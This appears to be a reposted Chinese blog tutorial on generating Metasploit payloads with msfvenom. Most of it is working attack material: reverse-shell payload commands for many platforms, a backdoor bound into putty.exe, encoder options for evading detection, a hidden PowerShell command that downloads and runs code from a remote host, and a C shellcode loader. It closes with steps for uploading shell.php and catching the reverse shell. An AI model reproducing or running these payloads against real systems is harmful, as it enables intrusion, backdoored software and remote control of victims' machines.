msfvenom简单使用教程

admin 2022年4月19日23:00:34安全文章评论36 views5060字阅读16分52秒阅读模式

现在metasploit framwork主要包括了msfconsole和msfvenom两个部分,msfconsole提供了一个一体化的集中控制台。通过msfconsole,我们可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线,从而拿到远程主机shellcode。

下面我们讨论msfvenom的简单使用方法:

msfvenom参数说明:

msfvenom简单使用教程

msfvenom生成shellcode:

实例1:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o  shell.exe-p 指定payload,payload后跟该payload的选项-o 指定payload的保存路径,包含文件名

实例2(替换指定代码):msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -b 'x00' -f exe -o shell.exe-b 替换代码中会出现中断的字符,如 'x00xff'

实例3(指定编码器):msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -b 'x00' -e x86/shikata_ga_nai -f exe -o shell.exe-e 指定特定的编码器

实例4(绑定后门到其他可执行程序上):msfvenom -p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -x /Users/bikhoff/putty.exe -k -f exe -o /Users/birkhoff/puuty_bind.exe-p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> 指定payload和payload的参数-x /Users/birkhoff/putty.exe执行要绑定的软件-k从原始的注文件中分离出来,单独创建一个进程-f exe指定输出格式-o /Users/birkhoff/puuty_bind.exe指定输出路径

实例5  Windowsmsfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exemsfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:back.exe

实例6  Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

实例7 MACmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

实例8 PHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

实例9 Aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

实例10  Aspxmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

实例11  JSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

实例12  Warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

实例13 Bashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw > shell.sh

实例14  Perlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

实例15 Pythonmsfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

实例16 exe 利用exec执行powershell后门msfvenom -p windows/exec CMD="powershell.exe -nop -w hidden -c M.proxy=[Net.WebRequest]::GetSystemWebProxy();M.downloadstring('http://192.168.0.104:8080/4WFjDXrGo7Mj');" -f exe -e x86/shikata_ga_nai -i 6 -o msf.exe

实例17 输出c格式 在vs中编译生成

msfvenom -p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f c

生成C版本的shellcode 放入vs工程中 编译生成exe文件

include "windows.h"include "stdio.h"unsigned char shellcode[]="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"  "x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"  "x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"  "x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"  "x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"  "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"  "x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"  "x8dx5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4c"  "x77x26x07xffxd5x31xdbx53x53x53x53x53x68x3ax56"  "x79xa7xffxd5x53x53x6ax03x53x53x68xb3x15x00x00"  "xe8x6ax01x00x00x2fx57x65x56x69x48x48x4ex41x6f"  "x4fx51x36x76x54x75x38x59x37x52x73x4dx41x38x68"  "x72x6ax33x30x67x39x42x41x6cx42x35x66x45x68x33"  "x66x2dx65x68x69x6ex46x42x33x45x4dx59x59x79x7a"  "x46x34x53x34x6cx50x74x4fx57x6ax4ex63x46x6bx6f"  "x73x47x6ex70x53x50x53x6ex33x64x73x53x7ax6ex2d"  "x41x2dx50x56x39x74x2dx6fx58x4fx56x45x30x47x55"  "x61x63x34x61x41x68x42x53x67x57x58x69x6cx71x52"  "x33x6bx6bx59x59x56x63x42x4dx37x75x79x4fx70x38"  "x45x5fx4dx70x44x30x35x39x4bx4bx6bx4bx49x6cx6a"  "x48x51x50x2dx4dx32x75x64x4ex58x47x63x51x35x5a"  "x4bx49x41x42x43x59x6fx55x72x53x77x34x4ex59x35"  "x48x46x41x49x78x63x63x41x69x73x6cx43x4cx44x76"  "x57x5fx77x64x32x67x39x68x4dx51x54x31x39x50x50"  "x50x53x41x41x4fx51x55x6bx68x4ex63x56x46x7ax2d"  "x4cx4ax47x38x52x58x38x61x6fx4cx6bx2dx4bx34x77"  "x46x48x72x00x50x68x57x89x9fxc6xffxd5x89xc6x53"  "x68x00x02x60x84x53x53x53x57x53x56x68xebx55x2e"  "x3bxffxd5x96x6ax0ax5fx53x53x53x53x56x68x2dx06"  "x18x7bxffxd5x85xc0x75x14x68x88x13x00x00x68x44"  "xf0x35xe0xffxd5x4fx75xe1xe8x4cx00x00x00x6ax40"  "x68x00x10x00x00x68x00x00x40x00x53x68x58xa4x53"  "xe5xffxd5x93x53x53x89xe7x57x68x00x20x00x00x53"  "x56x68x12x96x89xe2xffxd5x85xc0x74xcfx8bx07x01"  "xc3x85xc0x75xe5x58xc3x5fxe8x7fxffxffxffx31x39"  "x32x2ex31x36x38x2ex31x31x34x2ex31x34x30x00xbb"  "xf0xb5xa2x56x6ax00x53xffxd5";  void main()  {      LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);      memcpy(Memory, shellcode, sizeof(shellcode));      ((void(*)())Memory)();  }

msf设置监听

当目标主机执行反弹式shellcode后,会回连当前机器 ,需要设置端口监听。

以实例5为例:

生成test.ext文件

msfvenom简单使用教程

设置监听:

msfvenom简单使用教程

目标机上执行test.exe:

msfvenom简单使用教程

已反弹shell:

msfvenom简单使用教程

以实例8为例:

生成shell.php文件

msfvenom简单使用教程

设置监听:

msfvenom简单使用教程

上传shell.php:

msfvenom简单使用教程

触发shell.php,界面无反应

msfvenom简单使用教程

已反弹shell:

msfvenom简单使用教程


原文始发于微信公众号(CTS纵横安全实验室):msfvenom简单使用教程

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月19日23:00:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  msfvenom简单使用教程 http://cn-sec.com/archives/873668.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: